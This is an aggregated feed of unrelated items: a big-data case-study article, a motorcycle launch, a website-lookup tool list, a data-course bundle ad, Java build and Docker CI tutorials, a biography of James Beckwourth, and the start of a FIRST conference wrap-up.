In American households with infants, the mother usually stays home to look after the baby, so the young father goes to the supermarket to buy diapers. While buying diapers, fathers often picked up beer for themselves, which is why the two apparently unrelated products kept showing up in the same basket. If a young father could find only one of the two products in a store, he might well abandon the purchase and go to another shop where he could buy both at once. Having discovered this pattern, Walmart began placing beer and diapers in the same area of its stores, so young fathers could find both products and finish shopping quickly; Walmart, in turn, got these customers to buy two items instead of one, earning solid additional sales revenue. That is the origin of the "beer and diapers" story.

Of course, the "beer and diapers" story needed technical support. In 1993, the American scholar Agrawal proposed an association algorithm for analyzing the sets of products in shopping baskets to find relationships between products and, from those relationships, customers' buying behavior. Agrawal formulated the computation of product associations from a mathematical and algorithmic standpoint as the Apriori algorithm. Walmart began applying Apriori to its POS data in the 1990s and succeeded, and thus the "beer and diapers" story was born.

6.2 Data Analysis Helps the Cincinnati Zoo Improve Customer Satisfaction


Founded in 1873, the Cincinnati Zoo & Botanical Garden is one of the most famous zoos in the world, enjoying a stellar reputation for species protection and preservation and for its high-survival-rate breeding programs. It covers 71 acres, houses 500 animal species and more than 3,000 plant species, and is one of the most visited zoos in the United States; it has been named a Zagat top-ten zoo and was voted children's favorite zoo by Parents magazine, receiving more than 1.3 million visitors a year.

The zoo is a non-profit organization and receives the lowest public subsidy of any zoo in Ohio, indeed in the United States: excluding government subsidies, more than two-thirds of its $26 million annual budget is self-funded. It therefore constantly needs to find additional revenue, and the best way to do that is to serve staff and visitors better and increase attendance, a win for the zoo, its customers, and taxpayers alike.

Thanks to the solution's powerful collection and processing capabilities, connectivity, analytics, and the insight these bring, the organization realized the following benefits after deployment:
- Understanding each customer's browsing, usage, and spending patterns, and acting on time and location data to improve the visitor experience while maximizing revenue.
- Segmenting zoo visitors by spending and visiting behavior, and targeting marketing and promotions at each segment, markedly improving loyalty and customer retention.
- Identifying low-spending visitors and sending them strategically targeted direct mail, while rewarding loyal customers with creative marketing and incentive programs.
- A 360-degree view of customer behavior to optimize marketing decisions, saving more than $40,000 in marketing costs in the first year after implementation while strengthening measurable results.
- Geographic analysis revealed many promotions and discount programs that failed to deliver the expected results; redeploying those resources to higher-yield activities saves the zoo more than $100,000 a year.
- Stronger marketing raised overall attendance, adding at least 50,000 visits in 2011.
- Insights strengthened operations. For example, seeing an ice-cream sales spike just before closing, the zoo extended ice-cream stand hours until closing time, adding $2,000 a day in summer revenue.
- Food and beverage sales rose 30.7% year over year, and retail sales rose 5.9%.
- The zoo's senior management team can make better decisions without needing IT involvement or support.
- Analytics were brought into the boardroom, with intuitive tools that help business staff understand the data.

6.3 Sentiment Analysis of the Yunnan Zhaotong Incident of Police Beating a Middle School Student

Background:

On May 20, a netizen posted on Weibo that Kong Dezheng, an eighth-grade student at Ludian No. 2 Middle School in Zhaotong, Yunnan, called out "you on the phone, come down" to three police officers who had responded to a call at the school and were about to drive away. Two officers in the vehicle heard him, got out, chased the student down, and beat him with fists and kicks.

On May 26, the news office of the Ludian County Public Security Bureau in Zhaotong responded: the bureau had suspended the police officer involved from duty, dismissed the two auxiliary officers who beat the student, and would take further action in accordance with law and regulation as the investigation proceeded. The bureau also pledged to strengthen discipline and training within the force to prevent such incidents from happening again.

Development:


On May 26, public attention to the incident rose sharply. Media coverage focused on angles such as "the head teacher says the student often stirred up trouble and performed poorly", "the beaten student's classmates went to the police station to demand an explanation", and "the school asked students to delete the photos"; the exposure of the school's demand to delete the pictures threatened to widen the controversy.

On the evening of May 26, Xinhuanet published the article "Police respond to 'Yunnan student beaten by two officers': officer suspended, auxiliary officers dismissed". Once the central mainstream online media had published the official outcome, portal sites such as NetEase, Sina, and Tencent reposted it, giving the official response wide distribution.


Public attention trend for the Zhaotong police beating incident (sample size: 290 posts)

Summary:

"Police beat a student, and there were pictures to prove it: five days after the event, the police of Ludian County, Zhaotong ended up at the center of public opinion. After the incident, local officials responded actively and disciplined those involved on May 26; this decisive assignment of responsibility was fairly effective at calming public sentiment and largely defused the crisis.

Looking at how the story spread: the incident occurred on May 20, but public debate erupted only on the 25th. Four quiet days led the Ludian police to assume the matter was closed and perhaps already forgotten. Had the active local netizen "直播云南" (Live Yunnan) not posted about it on May 25, and had the local newspaper Life New Daily (生活新报) not picked it up, the matter might indeed have ended there; but public opinion does not deal in hypotheticals. The lesson, at the very least, is that negative information on Weibo and other social media platforms must be monitored in real time: monitor ordinary grassroots users, and monitor locally verified, active netizens even more closely. In a sense, locally verified netizens are the more powerful "engines of public opinion": once they post or repost negative news, it spreads further and the resulting pressure is greater.

The school also played a crucial role in this incident. Both the head teacher and the school itself responded poorly. The school-level instruction to "delete the photos" was bound to antagonize netizens and students, and that resentment only strengthened students' urge to spread the story. The head teacher's remarks that the student "studied poorly and liked to stir up trouble" were read as "the student deserved the beating"; against the backdrop of the teaching profession's already shaky public image, such remarks reflect a lapse of responsibility. The inappropriate actions of the school and the head teacher made both handling the incident and guiding public opinion markedly harder, which should never have happened." (Zhu Minggang, public opinion analyst, People's Daily Online Public Opinion Monitoring Office)

7. Big Data Word Clouds
[Word-cloud images from the original article]

End.

Reposted from 36大数据 (36dsj.com); please credit the source: Big Data Is All Around You: Everyday Big Data Analysis Cases and the Technology Behind Them


          Bajaj Pulsar 160NS launched | vs Gixxer, Apache, FZ   

Bajaj Auto has finally launched the Pulsar 160NS in India at a price of Rs. 78,368 (ex-showroom, Delhi). The bike has been in the news since 2013, and now that it is launched, we can leave all the speculation and rumours behind.

Price: Rs. 78,368
Launch date: 30/06/2017
Engine: 160.3cc
Power: 15.5 PS

The Bajaj Pulsar 160NS looks like a solid machine from the Indian manufacturer. It adopts the Pulsar 200NS' design language, which is a definite plus point. The bike gets a single headlamp set-up at the front, a chiselled fuel tank (12 l), split seats and a rear tyre hugger. The […]



          Know Your website   
Here are a few online tools to get to know your website:

1) Just-Ping.com - Helps you check whether your website or blog is accessible from different cities around the world.

2) WhoIsTheOwner.net - Lets you find the contact address, email and phone number of a website's owner.

3) YouGetSignal.com - The web server hosting your website may also be housing dozens of other websites; YouGetSignal's reverse IP lookup shows you which other sites share your server.

4) WhoIsHostingThis.com - Enter the URL of any website and this online service will show you the name of the company that's hosting the website.

5) SocialMeter.com - This service helps you determine the popularity of a web page on social sites like Digg, delicious, Google Bookmarks, etc.

6) BuiltWith.com - Is Digg running on Apache or Windows servers? What advertising programs is Arrington using to monetize TechCrunch? Is Google using Urchin for web analytics? Is CNN using Akamai? For answers to all these questions, refer to BuiltWith, a website profiling service that tells you about all the technologies used in creating a website. (Source: Labnol)

          The Ultimate Data Infrastructure Architect Bundle for $36   
From MongoDB to Apache Flume, This Comprehensive Bundle Will Have You Managing Data Like a Pro In No Time
Expires June 01, 2022 23:59 PST
Buy now and get 94% off

Learning ElasticSearch 5.0


KEY FEATURES

Learn how to use ElasticSearch in combination with the rest of the Elastic Stack to ship, parse, store, and analyze logs! You'll start by getting an understanding of what ElasticSearch is, what it's used for, and why it's important before being introduced to the new features of Elastic Search 5.0.

  • Access 35 lectures & 3 hours of content 24/7
  • Go through each of the fundamental concepts of ElasticSearch such as queries, indices, & aggregation
  • Add more power to your searches using filters, ranges, & more
  • See how ElasticSearch can be used w/ other components like LogStash, Kibana, & Beats
  • Build, test, & run your first LogStash pipeline to analyze Apache web logs

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: all levels

Compatibility

  • Internet required

THE EXPERT

Ethan Anthony is a San Francisco based Data Scientist who specializes in distributed data centric technologies. He is also the Founder of XResults, where the vision is to harness the power of data to innovate and deliver intuitive customer facing solutions, largely to non-technical professionals. Ethan has over 10 combined years of experience in cloud based technologies such as Amazon webservices and OpenStack, as well as the data centric technologies of Hadoop, Mahout, Spark and ElasticSearch. He began using ElasticSearch in 2011 and has since delivered solutions based on the Elastic Stack to a broad range of clientele. Ethan has also consulted worldwide, speaks fluent Mandarin Chinese and is insanely curious about human cognition, as related to cognitive dissonance.

Apache Spark 2 for Beginners


KEY FEATURES

Apache Spark is one of the most widely-used large-scale data processing engines and runs at extremely high speeds. It's a framework that has tools that are equally useful for app developers and data scientists. This book starts with the fundamentals of Spark 2 and covers the core data processing framework and API, installation, and application development setup.

  • Access 45 lectures & 5.5 hours of content 24/7
  • Learn the Spark programming model through real-world examples
  • Explore Spark SQL programming w/ DataFrames
  • Cover the charting & plotting features of Python in conjunction w/ Spark data processing
  • Discuss Spark's stream processing, machine learning, & graph processing libraries
  • Develop a real-world Spark application

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: all levels

Compatibility

  • Internet required

THE EXPERT

Rajanarayanan Thottuvaikkatumana, Raj, is a seasoned technologist with more than 23 years of software development experience at various multinational companies. He has lived and worked in India, Singapore, and the USA, and is presently based out of the UK. His experience includes architecting, designing, and developing software applications. He has worked on various technologies including major databases, application development platforms, web technologies, and big data technologies. Since 2000, he has been working mainly in Java related technologies, and does heavy-duty server-side programming in Java and Scala. He has worked on very highly concurrent, highly distributed, and high transaction volume systems. Currently he is building a next generation Hadoop YARN-based data processing platform and an application suite built with Spark using Scala.

Raj holds one master's degree in Mathematics, one master's degree in Computer Information Systems and has many certifications in ITIL and cloud computing to his credit. Raj is the author of Cassandra Design Patterns - Second Edition, published by Packt.

When not working on the assignments his day job demands, Raj is an avid listener to classical music and watches a lot of tennis.

Designing AWS Environments


KEY FEATURES

Amazon Web Services (AWS) provides trusted, cloud-based solutions to help businesses meet all of their needs. Running solutions in the AWS Cloud can help you (or your company) get applications up and running faster while providing the security needed to meet your compliance requirements. This course leaves no stone unturned in getting you up to speed with administering AWS.

  • Access 19 lectures & 2 hours of content 24/7
  • Familiarize yourself w/ the key capabilities to architect & host apps, websites, & services on AWS
  • Explore the available options for virtual instances & demonstrate launching & connecting to them
  • Design & deploy networking & hosting solutions for large deployments
  • Focus on security & important elements of scalability & high availability

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: all levels

Compatibility

  • Internet required

THE EXPERT

Wayde Gilchrist started moving customers of his IT consulting business into the cloud and away from traditional hosting environments in 2010. In addition to consulting, he delivers AWS training for Fortune 500 companies, government agencies, and international consulting firms. When he is not out visiting customers, he is delivering training virtually from his home in Florida.

Learning MongoDB


KEY FEATURES

Businesses today have access to more data than ever before, and a key challenge is ensuring that data can be easily accessed and used efficiently. MongoDB makes it possible to store and process large sets of data in ways that drive up business value. Learning MongoDB will give you the flexibility of unstructured storage, combined with robust querying and post-processing functionality, making you an asset to enterprise Big Data needs.

  • Access 64 lectures & 40 hours of content 24/7
  • Master data management, queries, post processing, & essential enterprise redundancy requirements
  • Explore advanced data analysis using both MapReduce & the MongoDB aggregation framework
  • Delve into SSL security & programmatic access using various languages
  • Learn about MongoDB's built-in redundancy & scale features, replica sets, & sharding

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: all levels

Compatibility

  • Internet required

THE EXPERT

Daniel Watrous is a 15-year veteran of designing web-enabled software. His focus on data store technologies spans relational databases, caching systems, and contemporary NoSQL stores. For the last six years, he has designed and deployed enterprise-scale MongoDB solutions in semiconductor manufacturing and information technology companies. He holds a degree in electrical engineering from the University of Utah, focusing on semiconductor physics and optoelectronics. He also completed an MBA from the Northwest Nazarene University. In his current position as senior cloud architect with Hewlett Packard, he focuses on highly scalable cloud-native software systems.

Learning Hadoop 2


KEY FEATURES

Hadoop emerged in response to the proliferation of masses and masses of data collected by organizations, offering a strong solution to store, process, and analyze what has commonly become known as Big Data. It comprises a comprehensive stack of components designed to enable these tasks on a distributed scale, across multiple servers and thousands of machines. In this course, you'll learn Hadoop 2, introducing yourself to the powerful system synonymous with Big Data.

  • Access 19 lectures & 1.5 hours of content 24/7
  • Get an overview of the Hadoop component ecosystem, including HDFS, Sqoop, Flume, YARN, MapReduce, Pig, & Hive
  • Install & configure a Hadoop environment
  • Explore Hue, the graphical user interface of Hadoop
  • Discover HDFS to import & export data, both manually & automatically
  • Run computations using MapReduce & get to grips working w/ Hadoop's scripting language, Pig
  • Siphon data from HDFS into Hive & demonstrate how it can be used to structure & query data sets

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: all levels

Compatibility

  • Internet required

THE EXPERT

Randal Scott King is the Managing Partner of Brilliant Data, a consulting firm specialized in data analytics. In his 16 years of consulting, Scott has amassed an impressive list of clientele from mid-market leaders to Fortune 500 household names. Scott lives just outside Atlanta, GA, with his children.

ElasticSearch 5.x Cookbook eBook


KEY FEATURES

ElasticSearch is a Lucene-based distributed search server that allows users to index and search unstructured content with petabytes of data. Through this ebook, you'll be guided through comprehensive recipes covering what's new in ElasticSearch 5.x as you create complex queries and analytics. By the end, you'll have an in-depth knowledge of how to implement the ElasticSearch architecture and be able to manage data efficiently and effectively.

  • Access 696 pages of content 24/7
  • Perform index mapping, aggregation, & scripting
  • Explore the modules of Cluster & Node monitoring
  • Understand how to install Kibana to monitor a cluster & extend Kibana for plugins
  • Integrate your Java, Scala, Python, & Big Data apps w/ ElasticSearch

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: all levels

Compatibility

  • Internet required

THE EXPERT

Alberto Paro is an engineer, project manager, and software developer. He currently works as freelance trainer/consultant on big data technologies and NoSQL solutions. He loves to study emerging solutions and applications mainly related to big data processing, NoSQL, natural language processing, and neural networks. He began programming in BASIC on a Sinclair Spectrum when he was eight years old, and to date, has collected a lot of experience using different operating systems, applications, and programming languages.

In 2000, he graduated in computer science engineering from Politecnico di Milano with a thesis on designing multiuser and multidevice web applications. He assisted professors at the university for about a year. He then came in contact with The Net Planet Company and loved their innovative ideas; he started working on knowledge management solutions and advanced data mining products. In summer 2014, his company was acquired by a big data technologies company, where he worked until the end of 2015 mainly using Scala and Python on state-of-the-art big data software (Spark, Akka, Cassandra, and YARN). In 2013, he started freelancing as a consultant for big data, machine learning, Elasticsearch and other NoSQL products. He has created or helped to develop big data solutions for business intelligence, financial, and banking companies all over the world. A lot of his time is spent teaching how to efficiently use big data solutions (mainly Apache Spark), NoSql datastores (Elasticsearch, HBase, and Accumulo) and related technologies (Scala, Akka, and Playframework). He is often called to present at big data or Scala events. He is an evangelist on Scala and Scala.js (the transcompiler from Scala to JavaScript).

In his spare time, when he is not playing with his children, he likes to work on open source projects. When he was in high school, he started contributing to projects related to the GNOME environment (gtkmm). One of his preferred programming languages is Python, and he wrote one of the first NoSQL backends on Django for MongoDB (Django-MongoDBengine). In 2010, he began using Elasticsearch to provide search capabilities to some Django e-commerce sites and developed PyES (a Pythonic client for Elasticsearch), as well as the initial part of the Elasticsearch MongoDB river. He is the author of Elasticsearch Cookbook as well as a technical reviewer of Elasticsearch Server-Second Edition, Learning Scala Web Development, and the video course, Building a Search Server with Elasticsearch, all of which are published by Packt Publishing.

Fast Data Processing with Spark 2 eBook


KEY FEATURES

Compared to Hadoop, Spark is a significantly more simple way to process Big Data at speed. It is increasing in popularity with data analysts and engineers everywhere, and in this course you'll learn how to use Spark with minimum fuss. Starting with the fundamentals, this ebook will help you take your Big Data analytical skills to the next level.

  • Access 274 pages of content 24/7
  • Get to grips w/ some simple APIs before investigating machine learning & graph processing
  • Learn how to use the Spark shell
  • Load data & build & run your own Spark applications
  • Discover how to manipulate RDD
  • Understand useful machine learning algorithms w/ the help of Spark MLlib & R

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: all levels

Compatibility

  • Internet required

THE EXPERT

Krishna Sankar is a Senior Specialist—AI Data Scientist with Volvo Cars focusing on Autonomous Vehicles. His earlier stints include Chief Data Scientist at http://cadenttech.tv/, Principal Architect/Data Scientist at Tata America Intl. Corp., Director of Data Science at a bioinformatics startup, and as a Distinguished Engineer at Cisco. He has been speaking at various conferences including ML tutorials at Strata SJC and London 2016, Spark Summit, Strata-Spark Camp, OSCON, PyCon, and PyData, writes about Robots Rules of Order, Big Data Analytics—Best of the Worst, predicting NFL, Spark, Data Science, Machine Learning, Social Media Analysis as well as has been a guest lecturer at the Naval Postgraduate School. His occasional blogs can be found at https://doubleclix.wordpress.com/. His other passion is flying drones (working towards Drone Pilot License (FAA UAS Pilot) and Lego Robotics—you will find him at the St.Louis FLL World Competition as Robots Design Judge.

MongoDB Cookbook: Second Edition eBook


KEY FEATURES

MongoDB is a high-performance, feature-rich, NoSQL database that forms the backbone of the systems that power many organizations. Packed with easy-to-use features that have become essential for a variety of software professionals, MongoDB is a vital technology to learn for any aspiring data scientist or systems engineer. This cookbook contains many solutions to the everyday challenges of MongoDB, as well as guidance on effective techniques to extend your skills and capabilities.

  • Access 274 pages of content 24/7
  • Initialize the server in three different modes w/ various configurations
  • Get introduced to programming language drivers in Java & Python
  • Learn advanced query operations, monitoring, & backup using MMS
  • Find recipes on cloud deployment, including how to work w/ Docker containers along MongoDB

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: all levels

Compatibility

  • Internet required

THE EXPERT

Amol Nayak is a MongoDB certified developer and has been working as a developer for over 8 years. He is currently employed with a leading financial data provider, working on cutting-edge technologies. He has used MongoDB as a database for various systems at his current and previous workplaces to support enormous data volumes. He is an open source enthusiast and supports it by contributing to open source frameworks and promoting them. He has made contributions to the Spring Integration project, and his contributions are the adapters for JPA, XQuery, MongoDB, Push notifications to mobile devices, and Amazon Web Services (AWS). He has also made some contributions to the Spring Data MongoDB project. Apart from technology, he is passionate about motor sports and is a race official at Buddh International Circuit, India, for various motor sports events. Earlier, he was the author of Instant MongoDB, Packt Publishing.

Cyrus Dasadia always liked tinkering with open source projects since 1996. He has been working as a Linux system administrator and part-time programmer for over a decade. He works at InMobi, where he loves designing tools and platforms. His love for MongoDB started in 2013, when he was amazed by its ease of use and stability. Since then, almost all of his projects are written with MongoDB as the primary backend. Cyrus is also the creator of an open source alert management system called CitoEngine. He likes spending his spare time trying to reverse engineer software, playing computer games, or increasing his silliness quotient by watching reruns of Monty Python.

Learning Apache Kafka: Second Edition eBook


KEY FEATURES

Apache Kafka is simple to describe at a high level but has an immense amount of technical detail when you dig deeper. This step-by-step, practical guide will help you take advantage of the power of Kafka to handle hundreds of megabytes of messages per second from multiple clients.

  • Access 120 pages of content 24/7
  • Set up Kafka clusters
  • Understand basic blocks like producer, broker, & consumer blocks
  • Explore additional settings & configuration changes to achieve more complex goals
  • Learn how Kafka is designed internally & what configurations make it most effective
  • Discover how Kafka works w/ other tools like Hadoop, Storm, & more

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: all levels

Compatibility

  • Internet required

THE EXPERT

Nishant Garg has over 14 years of software architecture and development experience in various technologies, such as Java Enterprise Edition, SOA, Spring, Hadoop, Hive, Flume, Sqoop, Oozie, Spark, Shark, YARN, Impala, Kafka, Storm, Solr/Lucene, NoSQL databases (such as HBase, Cassandra, and MongoDB), and MPP databases (such as GreenPlum).

He received his MS in software systems from the Birla Institute of Technology and Science, Pilani, India, and is currently working as a technical architect for the Big Data R&D Group with Impetus Infotech Pvt. Ltd. Previously, Nishant has enjoyed working with some of the most recognizable names in IT services and financial industries, employing full software life cycle methodologies such as Agile and SCRUM.

Nishant has also undertaken many speaking engagements on big data technologies and is also the author of HBase Essestials, Packt Publishing.

Apache Flume: Distributed Log Collection for Hadoop: Second Edition eBook


KEY FEATURES

Apache Flume is a distributed, reliable, and available service used to efficiently collect, aggregate, and move large amounts of log data. It's used to stream logs from application servers to HDFS for ad hoc analysis. This ebook starts with an architectural overview of Flume and its logical components, and pulls everything together into a real-world, end-to-end use case encompassing simple and advanced features.

  • Access 178 pages of content 24/7
  • Explore channels, sinks, & sink processors
  • Learn about sources & channels
  • Construct a series of Flume agents to dynamically transport your stream data & logs from your systems into Hadoop

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: all levels

Compatibility

  • Internet required

THE EXPERT

Steve Hoffman has 32 years of experience in software development, ranging from embedded software development to the design and implementation of large-scale, service-oriented, object-oriented systems. For the last 5 years, he has focused on infrastructure as code, including automated Hadoop and HBase implementations and data ingestion using Apache Flume. Steve holds a BS in computer engineering from the University of Illinois at Urbana-Champaign and an MS in computer science from DePaul University. He is currently a senior principal engineer at Orbitz Worldwide (http://orbitz.com/).

          Daily Deal: The Ultimate Data Infrastructure Architect Bundle   

Businesses have access to mountains of data. Big data and how to properly manage it is a big deal. The $36 Ultimate Data Infrastructure Architect Bundle is designed to teach you how to manage it all to make it more useful. The bundle includes 5 courses covering ElasticSearch 5.0, Apache Spark 2, MongoDB, Hadoop 2, and Amazon Web Services (AWS). You also receive 5 e-books offering expanded training on the concepts introduced in the courses. You’ll get an ElasticSearch 5.x Cookbook, Fast Data Processing with Spark 2, a MongoDB Cookbook, Learning Apache Kafka and Apache Flume: Distributed Log Collection for Hadoop.

Note: The Techdirt Deals Store is powered and curated by StackCommerce. A portion of all sales from Techdirt Deals helps support Techdirt. The products featured do not reflect endorsements by our editorial team.




          Java 8 might kill doclint   
Since Java 8, javadoc's doclint has become a lot stricter. Up to now, we had some warnings here and there. But since we moved to Java 8, our Jenkins releases have been failing because doclint throws HTML parsing errors and stops the build. So I spent some time correcting those errors, thinking that it might not be such a bad idea to have correct javadoc after all.

Except that recently, we had to access a SOAP web service, so I used the tool provided with the JDK: wsimport. Not a bad tool; it actually generates nice javadoc. But doclint just does not like it. It does not like <p> tags without a matching closing tag. It does not like the <pre> tags either, or rather what comes right after them, which is something browsers should not interpret anyway. In short, doclint causes another JDK tool to fail at its job. So I resorted to Stephen Colebourne's advice and switched off doclint altogether. In our Maven configuration, it looks like this:

 <plugins>
    <plugin>
      <groupId>org.apache.maven.plugins</groupId>
      <artifactId>maven-javadoc-plugin</artifactId>
      <configuration>
        <additionalparam>-Xdoclint:none</additionalparam>
      </configuration>
    </plugin>
  </plugins>


          A Monster Calls Vfx Breakdown   


El Ranchito Imagen Digital presents the A Monster Calls VFX breakdown. Director: J. A. Bayona. Producers: Apaches Entertainment, La Trini and Telecinco. […]
          Black Past ― Beckwourth, James Pierson (c. 1805 - 1866)   
If any man of any color attained legendary status in the American West, it was James Beckwourth
 

 
(BlackPast.org) If any attestation to his fame is needed, one only has to read the description under the accompanying lithograph and note that even in France his fame preceded him. Coming to St. Louis, Missouri in the mid-1800s as the mulatto slave of his blacksmith father (who, according to the laws of the time, actually owned his own son), the young man quickly set out to conquer the West as a mountain man. For at least two decades he roamed the mountains and plains of the West and Northwest as part of the French fur trade, a colleague of men like Jim Bridger and Kit Carson.

According to his autobiography, he spent most of his adult life with Apaches, Crows and Sacs, who gave him the appellation Dark Sky. During these years he states that he fought in the Mexican War, led the Crows in battles against Blackfeet Indians, helped arrange a peace treaty with the Apaches, and hunted elk, buffalo and bear all the while as he traveled from Kansas to California. Near Lake Tahoe he discovered a mountain pass that bears his name to this day.


At the apex of his career he was named A Chief of All Chiefs by the Crow Nation. He married four women at different times: two Native Americans, a Latina, and an African American woman. By 1860 he had moved to the young town of Denver, Colorado Territory, where he owned a saloon and drew patrons with gregarious tall tales about a riotous life spent among Indians and in the mountains. Records of his death are unclear. One account has him returning to the Crows, who begged him to again become their leader; in this account he refused and committed ritual suicide so that he might die among his people. Others say that he passed on peacefully as an old man in Denver.

Sources: James P. Beckwourth (ed. T.D. Bonner), The Life and Adventures of James P. Beckwourth: Mountaineer, Scout and Pioneer (New York: Harper and Brothers, 1856); John W. Ravage, Black Pioneers: Images of the Black Experience on the North American Frontier (Salt Lake City: University of Utah Press, 1997, 2002).



          Jan De Dobbeleer: Java two dot oh   

I have to admit it, I'm not the biggest fan of Java. But, when they asked me to prepare a talk for first-year students who are currently learning to code using Java, I decided it was time to challenge some of my prejudices. As I selected continuous integration as the topic of choice, I started out by looking at all available tools to quickly set up a reliable Java project. Having played with dotnet core over the past months, I was looking for a tool that could do a bit of the same. A straightforward CLI interface that can create a project out of the box to mess around with. Maven proved to be of little help, but gradle turned out to be exactly what I was looking for. Great, I gained some faith.

It’s only while creating my slides and looking for tooling that can be used specifically for Java, that I had an epiphany. What if it is possible to create an entire developer environment using docker? So no need for local dependencies like linting tools or gradle. No need to mess with an IDE to get everything set up. And, no more “it works on my machine”. The power and advantages of a CI tool, straight onto your own computer.

A quick search on Google points us to gradle's own Alpine Linux container. It comes with JDK 8 out of the box, exactly what we're looking for. You can create a new Java application with a single command:

docker run -v=$(pwd):/app --workdir=/app gradle:alpine gradle init --type java-application

This starts a container, creates a volume linked to your current working directory and initializes a brand new Java application using gradle init --type java-application. As I don't feel like typing those commands all the time, I created a makefile to help me build and debug the app. Yes, you can debug the app while it's running in the container. Java supports remote debugging out of the box. Any modern IDE that supports Java has support for remote debugging. Simply run the make debug command and attach to the remote debugging session on port 1044.

ROOT_DIR:=$(shell dirname $(realpath $(lastword $(MAKEFILE_LIST))))

build:
    docker run --rm -v=${ROOT_DIR}:/app --workdir=/app gradle:alpine gradle clean build

debug: build
    docker run --rm -v=${ROOT_DIR}:/app -p 1044:1044 --workdir=/app gradle:alpine java -classpath /app/build/classes/main -verbose -agentlib:jdwp=transport=dt_socket,server=y,suspend=y,address=1044 App

Now that we have a codebase that uses the same tools to build, run and debug, we need to bring our coding standard to a higher level. First off we need a linting tool. Traditionally, people look at checkstyle when it comes to Java. And while that could be fine for you, I found that tool rather annoying to set up. XML is not something I like to mess with other than to create UI, so seeing this verbose config set me back. There simply wasn’t time to look at that. Even with the 2 different style guides, it would still require a bit of tweaking to get everything right and make the build pass.

As it turns out, there are other tools out there which feel a bit more 21st century. One of those is coala. Now, coala can be used as a linting tool on a multitude of languages, not just Java, so definitely take a look at it, even if you're not into Java yourself. It's a Python-based tool which has a lot of neat little bears who can do things. The config is a breeze as it's a yaml file, and they provide a container so you can run the checks in an isolated environment. All in all, exactly what we're looking for.

Let’s extend our makefile to run coala:

docker run --rm -v=${ROOT_DIR}:/app --workdir=/app coala/base coala --ci -V

I made sure to enable verbose logging, simply to be able to illustrate the tool to students. Feel free to disable that. You can easily control what coala needs to verify by creating a .coafile in the root of the repository. One of the major advantages of using coala over anything else is that it can do both simple linting checks and full-on static code analysis.

Let’s have a look at the settings I used to illustrate its power.

[Default]
files = src/**/*.java
language = java

[SPACES]
bears = SpaceConsistencyBear
use_spaces = True

[TODOS]
bears = KeywordBear

[PMD]
bears = JavaPMDBear
check_optimizations = true
check_naming = false

You can start out by defining a default. In my case, I'm telling coala to look for .java files which are written using Java. There are three bears being used. SpaceConsistencyBear, who will check for spaces and not tabs. KeywordBear, who dislikes //TODO comments in code, and JavaPMDBear, who invokes PMD to do some static code analysis. In the example, I had to set check_naming = false, otherwise I would have lost a lot of time fixing those errors (mostly due to my own lack of Java knowledge).

Now, whenever I want to validate my code and enforce certain rules for me and my team, I can use coala to achieve this. Simply run make validate and it will start the container and invoke coala. At this point, we can set up the CI logic in our makefile by simply combining the two commands.

ci: validate build

The command make ci will invoke coala and, if all goes well, use gradle to build and test the project. As a cherry on top, I also included test coverage. Using Jacoco, you can easily set up rules to fail the build when coverage goes below a certain threshold. The tool integrates directly into gradle and provides everything you need out of the box; simply add the following lines to your build.gradle file. This way, the build will fail if coverage drops below 50%.

apply plugin: 'jacoco'

jacocoTestReport {
    reports {
        xml.enabled true
        html.enabled true
    }
}

jacocoTestCoverageVerification {
    violationRules {
        rule {
            limit {
                minimum = 0.5
            }
        }
    }
}

check.dependsOn jacocoTestCoverageVerification

Make sure to edit the build step in the makefile to also include Jacoco.

build:
    docker run --rm -v=${ROOT_DIR}:/app --workdir=/app gradle:alpine gradle clean build jacocoTestReport

The only thing we still need to do is select a CI service of choice. I made sure to add examples for both circleci and travis, each of which only requires docker and an override to use our makefile instead of auto-detecting gradle and running that. The way we set up this project allows us to easily switch CI services when we need to, which is not all that strange given the lifecycle of a software project. The tools we choose when we start out might be selected to fit the needs at the time of creation, but nothing assures us that will stay true forever. Designing for change is not something we need to do in code alone; it has a direct impact on everything, so expect things to change and your assumptions to be challenged.
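For instance, the Travis variant can be as small as this (content assumed from the description above, not necessarily the author's exact file):

sudo: required
services:
  - docker
script:
  - make ci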

Have a look at the source code for all the info and the build files for the two services. Enjoy!

Source code


          Xavier Mertens: FIRST TC Amsterdam 2017 Wrap-Up   

Here is my quick wrap-up of the FIRST Technical Colloquium hosted by Cisco in Amsterdam. This is my first participation in a FIRST event. FIRST is an organization helping in incident response, as stated on their website:

FIRST is a premier organization and recognized global leader in incident response. Membership in FIRST enables incident response teams to more effectively respond to security incidents by providing access to best practices, tools, and trusted communication with member teams.

The event was organized at the Cisco office. Monday was dedicated to a training about incident response, and the two next days were dedicated to presentations, all of them focusing on the defence side ("blue team"). Here are a few notes about interesting stuff that I learned.

